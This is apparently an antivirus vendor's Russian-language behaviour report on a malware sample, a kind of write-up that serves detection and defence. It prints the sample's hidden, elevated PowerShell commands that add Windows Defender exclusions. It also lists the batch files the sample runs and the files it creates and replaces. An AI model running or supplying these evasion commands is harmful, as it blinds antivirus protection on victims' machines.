Техническая информация
Вредоносные функции
Для затруднения выявления своего присутствия в системе
добавляет исключения антивируса:
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hi sleep -Se 180; Start-Process powershell -ArgumentList { "Add-MpPreference -ExclusionPath C:\Users\Public\Documents"} -Verb runAs -windowstyle hidden
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hi sleep -Se 250; Start-Process powershell -ArgumentList { "Add-MpPreference -ExclusionPath C:\Users\Public\Documents"} -Verb runAs -windowstyle hidden
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hi sleep -Se 310; Start-Process powershell -ArgumentList { "Add-MpPreference -ExclusionPath C:\Users\Public\Documents"} -Verb runAs -windowstyle hidden
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c ""C:\Users\Public\Documents\god1.bat" "
- '<SYSTEM32>\cmd.exe' /c ""C:\Users\Public\Documents\god2.bat" "
- '<SYSTEM32>\cmd.exe' /c ""C:\Users\Public\Documents\god3.bat" "
- '<SYSTEM32>\cmd.exe' /c ""C:\Users\Public\Documents\god4.bat" "
Изменения в файловой системе
Создает следующие файлы
- C:\users\public\documents\god1.bat
- C:\users\public\documents\god2.bat
- C:\users\public\documents\god3.bat
- C:\users\public\documents\god4.bat
- <Текущая директория>\e9d11000
Подменяет следующие файлы
- <PATH_SAMPLE>.xls
